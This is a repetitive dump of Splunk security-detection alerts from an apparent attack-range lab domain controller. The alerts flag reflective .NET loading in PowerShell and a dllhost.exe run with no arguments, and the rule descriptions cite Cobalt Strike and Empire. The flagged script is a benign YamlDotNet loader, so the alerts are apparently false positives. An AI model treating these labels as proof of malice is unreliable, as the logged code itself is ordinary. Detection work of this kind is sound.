risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664798132, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T10:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T10:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664798132, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T10:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T10:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664798132, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T10:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T10:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664791200, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664791200", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="288", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664791200, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664791200", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x120", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664794532, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T09:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T09:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664794532, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T09:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T09:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664794532, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T09:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T09:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664794532, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = 